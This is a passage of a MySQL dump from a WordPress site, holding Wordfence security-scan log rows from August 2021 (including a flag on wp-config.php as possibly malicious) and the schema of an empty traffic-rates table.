far'),(3157,1629254302.419961,2,'info','Analyzed 3564 files containing 77.13 MB of data.'),(3158,1629254302.431534,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(3159,1629254302.478169,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(3160,1629254302.518750,10,'info','SUM_ENDOK:Scanning for known malware files'),(3161,1629254302.574047,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(3162,1629254302.601482,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(3163,1629254302.697458,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(3164,1629254302.740450,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(3165,1629254305.009946,2,'info','Starting scan of file contents'),(3166,1629254318.360823,2,'info','Scanned contents of 11 additional files at 0.83 per second'),(3167,1629254319.353564,2,'info','Scanned contents of 26 additional files at 1.82 per second'),(3168,1629254319.364338,2,'info','Asking Wordfence to check URLs against malware list.'),(3169,1629254319.381026,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(3170,1629254320.002799,2,'info','Done host key check.'),(3171,1629254320.803016,2,'info','Done file contents scan'),(3172,1629254320.815217,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(3173,1629254320.835899,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(3174,1629254320.868745,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(3175,1629254320.930029,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(3176,1629254320.963141,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(3177,1629254321.030451,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(3178,1629254321.493524,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3179,1629254321.505911,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(3180,1629254322.110806,2,'info','Done host key check.'),(3181,1629254322.156498,2,'info','Done examining URLs'),(3182,1629254322.375406,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(3183,1629254322.492789,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(3184,1629254322.906713,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(3185,1629254323.005345,10,'info','SUM_START:Scanning for weak passwords'),(3186,1629254323.038560,2,'info','Starting password strength check on 1 user.'),(3187,1629254323.142750,10,'info','SUM_ENDOK:Scanning for weak passwords'),(3188,1629254323.187329,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3189,1629254325.312678,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3190,1629254325.371683,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(3191,1629254325.999375,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(3192,1629254326.088142,10,'info','SUM_START:Scanning for suspicious site options'),(3193,1629254326.418470,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3194,1629254326.439276,2,'info','Done examining URLs'),(3195,1629254326.713967,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(3196,1629254326.755764,1,'info','-------------------'),(3197,1629254326.769423,2,'info','Wordfence used 14 MB of memory for scan. Server peak memory usage was: 50 MB'),(3198,1629254326.779905,1,'info','Scan Complete. Scanned 3564 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 7 minutes 16 seconds.'),(3199,1629254326.792190,10,'info','SUM_FINAL:Scan complete. You have 19 new issues to fix. See below.'),(3200,1629281791.058247,10,'info','SUM_PREP:Preparing a new scan.'),(3201,1629281791.072888,1,'info','Initiating quick scan'),(3202,1629281791.230203,10,'info','SUM_START:Checking Web Application Firewall status'),(3203,1629281791.242973,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3204,1629281792.026417,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3205,1629281792.220805,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3206,1629281792.254141,1,'info','-------------------'),(3207,1629281792.285691,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(3208,1629281792.288647,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3209,1629281792.299356,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.'),(3210,1629368312.818928,10,'info','SUM_PREP:Preparing a new scan.'),(3211,1629368312.888383,1,'info','Initiating quick scan'),(3212,1629368312.933382,10,'info','SUM_START:Checking Web Application Firewall status'),(3213,1629368312.943696,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3214,1629368312.976391,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3215,1629368313.151512,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3216,1629368313.173753,1,'info','-------------------'),(3217,1629368313.194873,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(3218,1629368313.205313,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3219,1629368313.225892,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.'),(3220,1629454610.765140,10,'info','SUM_PREP:Preparing a new scan.'),(3221,1629454610.810111,1,'info','Initiating quick scan'),(3222,1629454610.850226,10,'info','SUM_START:Checking Web Application Firewall status'),(3223,1629454610.870505,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3224,1629454610.925530,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3225,1629454611.163130,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3226,1629454611.211339,1,'info','-------------------'),(3227,1629454611.239484,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 28 MB'),(3228,1629454611.276307,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3229,1629454611.285928,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.'),(3230,1629513635.638224,1,'info','Scheduled Wordfence scan starting at Saturday 21st of August 2021 02:40:35 AM'),(3231,1629513638.844494,10,'info','SUM_PREP:Preparing a new scan.'),(3232,1629513638.891058,1,'info','Contacting Wordfence to initiate scan'),(3233,1629513639.963883,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(3234,1629513642.020004,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(3235,1629513644.067522,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(3236,1629513646.173156,10,'info','SUM_START:Checking for the most secure way to get IPs'),(3237,1629513646.200819,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(3238,1629513646.315306,10,'info','SUM_START:Scanning to check available disk space'),(3239,1629513646.348765,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(3240,1629513646.359384,2,'info','The disk has 3462876.77 MB available'),(3241,1629513646.381494,10,'info','SUM_ENDOK:Scanning to check available disk space'),(3242,1629513646.500760,10,'info','SUM_START:Checking Web Application Firewall status'),(3243,1629513646.538826,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3244,1629513646.596872,10,'info','SUM_START:Checking for future GeoIP support'),(3245,1629513646.620872,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(3246,1629513646.683180,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(3247,1629513646.705809,10,'info','SUM_ENDOK:Checking for paths skipped due to scan settings'),(3248,1629513646.747513,2,'info','Getting plugin list from WordPress'),(3249,1629513646.773147,2,'info','Found 4 plugins'),(3250,1629513646.782685,2,'info','Getting theme list from WordPress'),(3251,1629513646.843859,2,'info','Found 4 themes'),(3252,1629513647.720274,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(3253,1629513649.065919,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(3254,1629513649.159967,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(3255,1629513649.171991,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(3256,1629513649.216812,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(3257,1629513649.233711,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(3258,1629513649.323240,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(3259,1629513649.346609,10,'info','SUM_DISABLED:Skipping theme scan'),(3260,1629513649.364582,10,'info','SUM_DISABLED:Skipping plugin scan'),(3261,1629513649.395208,10,'info','SUM_START:Scanning for known malware files'),(3262,1629513649.439224,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(3263,1629513649.601884,2,'info','500 files indexed'),(3264,1629513649.775159,2,'info','1000 files indexed'),(3265,1629513649.941091,2,'info','1500 files indexed'),(3266,1629513650.001369,2,'info','2000 files indexed'),(3267,1629513650.139781,2,'info','2500 files indexed'),(3268,1629513650.226476,2,'info','3000 files indexed'),(3269,1629513650.345350,2,'info','3500 files indexed'),(3270,1629513650.370062,2,'info','3563 files indexed'),(3271,1629513658.929120,2,'info','Analyzed 100 files containing 7.46 MB of data so far'),(3272,1629513664.450663,2,'info','Analyzed 200 files containing 9.04 MB of data so far'),(3273,1629513668.685406,2,'info','Analyzed 300 files containing 10.36 MB of data so far'),(3274,1629513676.287249,2,'info','Analyzed 400 files containing 13.06 MB of data so far'),(3275,1629513681.367124,2,'info','Analyzed 500 files containing 13.91 MB of data so far'),(3276,1629513685.072688,2,'info','Analyzed 600 files containing 14.77 MB of data so far'),(3277,1629513689.812714,2,'info','Analyzed 700 files containing 15.91 MB of data so far'),(3278,1629513708.623351,2,'info','Analyzed 800 files containing 16.94 MB of data so far'),(3279,1629513714.925977,2,'info','Analyzed 900 files containing 18.69 MB of data so far'),(3280,1629513719.312172,2,'info','Analyzed 1000 files containing 24.17 MB of data so far'),(3281,1629513728.574691,2,'info','Analyzed 1100 files containing 25.65 MB of data so far'),(3282,1629513734.714673,2,'info','Analyzed 1200 files containing 26.87 MB of data so far'),(3283,1629513739.173772,2,'info','Analyzed 1300 files containing 27.55 MB of data so far'),(3284,1629513745.024725,2,'info','Analyzed 1400 files containing 28.49 MB of data so far'),(3285,1629513749.119746,2,'info','Analyzed 1500 files containing 28.53 MB of data so far'),(3286,1629513753.729085,2,'info','Analyzed 1600 files containing 28.56 MB of data so far'),(3287,1629513757.720852,2,'info','Analyzed 1700 files containing 29.8 MB of data so far'),(3288,1629513765.970131,2,'info','Analyzed 1800 files containing 32.28 MB of data so far'),(3289,1629513771.224703,2,'info','Analyzed 1900 files containing 33.26 MB of data so far'),(3290,1629513775.160954,2,'info','Analyzed 2000 files containing 34.47 MB of data so far'),(3291,1629513788.832347,2,'info','Analyzed 2100 files containing 36.95 MB of data so far'),(3292,1629513792.715158,2,'info','Analyzed 2200 files containing 39.41 MB of data so far'),(3293,1629513797.943193,2,'info','Analyzed 2300 files containing 40.45 MB of data so far'),(3294,1629513804.036780,2,'info','Analyzed 2400 files containing 43.56 MB of data so far'),(3295,1629513808.202288,2,'info','Analyzed 2500 files containing 44.18 MB of data so far'),(3296,1629513813.284200,2,'info','Analyzed 2600 files containing 46.08 MB of data so far'),(3297,1629513817.509747,2,'info','Analyzed 2700 files containing 48.94 MB of data so far'),(3298,1629513823.004415,2,'info','Analyzed 2800 files containing 50.7 MB of data so far'),(3299,1629513827.115517,2,'info','Analyzed 2900 files containing 52.44 MB of data so far'),(3300,1629513831.886857,2,'info','Analyzed 3000 files containing 64.94 MB of data so far'),(3301,1629513839.472600,2,'info','Analyzed 3100 files containing 66.52 MB of data so far'),(3302,1629513843.529807,2,'info','Analyzed 3200 files containing 68.92 MB of data so far'),(3303,1629513847.544744,2,'info','Analyzed 3300 files containing 71.74 MB of data so far'),(3304,1629513860.668623,2,'info','Analyzed 3400 files containing 74.82 MB of data so far'),(3305,1629513865.102752,2,'info','Analyzed 3500 files containing 75.99 MB of data so far'),(3306,1629513867.632815,2,'info','Analyzed 3563 files containing 77.11 MB of data.'),(3307,1629513867.641577,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(3308,1629513867.714440,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(3309,1629513867.783170,10,'info','SUM_ENDOK:Scanning for known malware files'),(3310,1629513867.856495,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(3311,1629513867.959703,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(3312,1629513868.006956,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(3313,1629513868.038625,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(3314,1629513869.549902,2,'info','Starting scan of file contents'),(3315,1629513870.647475,2,'info','Scanned contents of 17 additional files at 16.66 per second'),(3316,1629513871.200242,2,'info','Scanned contents of 26 additional files at 16.53 per second'),(3317,1629513871.244311,2,'info','Asking Wordfence to check URLs against malware list.'),(3318,1629513871.256351,2,'info','Checking 105 host keys against Wordfence scanning servers.'),(3319,1629513871.859437,2,'info','Done host key check.'),(3320,1629513872.897045,2,'info','Done file contents scan'),(3321,1629513872.916256,2,'info','Adding issue: File appears to be malicious or unsafe: wp-config.php'),(3322,1629513872.931654,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(3323,1629513872.967947,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(3324,1629513873.040886,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(3325,1629513873.069799,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(3326,1629513873.126391,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(3327,1629513873.646071,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(3328,1629513873.679045,2,'info','Checking 106 host keys against Wordfence scanning servers.'),(3329,1629513874.285971,2,'info','Done host key check.'),(3330,1629513874.305133,2,'info','Done examining URLs'),(3331,1629513874.493506,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(3332,1629513884.624294,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(3333,1629513885.173616,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(3334,1629513885.243570,10,'info','SUM_START:Scanning for weak passwords'),(3335,1629513885.265122,2,'info','Starting password strength check on 1 user.'),(3336,1629513885.399430,10,'info','SUM_ENDOK:Scanning for weak passwords'),(3337,1629513885.449922,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3338,1629513887.625530,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3339,1629513887.676713,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(3340,1629513888.300704,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(3341,1629513888.398961,10,'info','SUM_START:Scanning for suspicious site options'),(3342,1629513888.802609,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(3343,1629513888.814155,2,'info','Done examining URLs'),(3344,1629513889.037005,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(3345,1629513889.099049,1,'info','-------------------'),(3346,1629513889.122831,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 46 MB'),(3347,1629513889.130114,1,'info','Scan Complete. Scanned 3563 files, 5 plugins, 4 themes, 31 posts, 0 comments and 105 URLs in 4 minutes 10 seconds.'),(3348,1629513889.147065,10,'info','SUM_FINAL:Scan complete. You have 18 new issues to fix. See below.'),(3349,1629540997.165582,10,'info','SUM_PREP:Preparing a new scan.'),(3350,1629540997.213480,1,'info','Initiating quick scan'),(3351,1629540997.266184,10,'info','SUM_START:Checking Web Application Firewall status'),(3352,1629540997.286191,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3353,1629540997.346199,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3354,1629540997.644263,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3355,1629540997.669701,1,'info','-------------------'),(3356,1629540997.715327,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(3357,1629540997.735653,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3358,1629540997.751253,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.'),(3359,1629627780.853119,10,'info','SUM_PREP:Preparing a new scan.'),(3360,1629627780.912233,1,'info','Initiating quick scan'),(3361,1629627780.954722,10,'info','SUM_START:Checking Web Application Firewall status'),(3362,1629627780.980451,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3363,1629627781.071227,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3364,1629627781.428063,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3365,1629627781.486161,1,'info','-------------------'),(3366,1629627781.543280,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 36 MB'),(3367,1629627781.566039,1,'info','Quick Scan Complete. Scanned in 1 second.'),(3368,1629627781.589004,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.'),(3369,1629713828.396447,10,'info','SUM_PREP:Preparing a new scan.'),(3370,1629713828.448921,1,'info','Initiating quick scan'),(3371,1629713828.509233,10,'info','SUM_START:Checking Web Application Firewall status'),(3372,1629713828.532013,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(3373,1629713828.635419,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(3374,1629713828.858436,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(3375,1629713828.884937,1,'info','-------------------'),(3376,1629713828.913771,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 34 MB'),(3377,1629713828.946931,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(3378,1629713828.949777,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.');
/*!40000 ALTER TABLE `wp_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wftrafficrates`
--

DROP TABLE IF EXISTS `wp_wftrafficrates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wftrafficrates`
--

LOCK TABLES `wp_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wp_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-02-01  0:01:26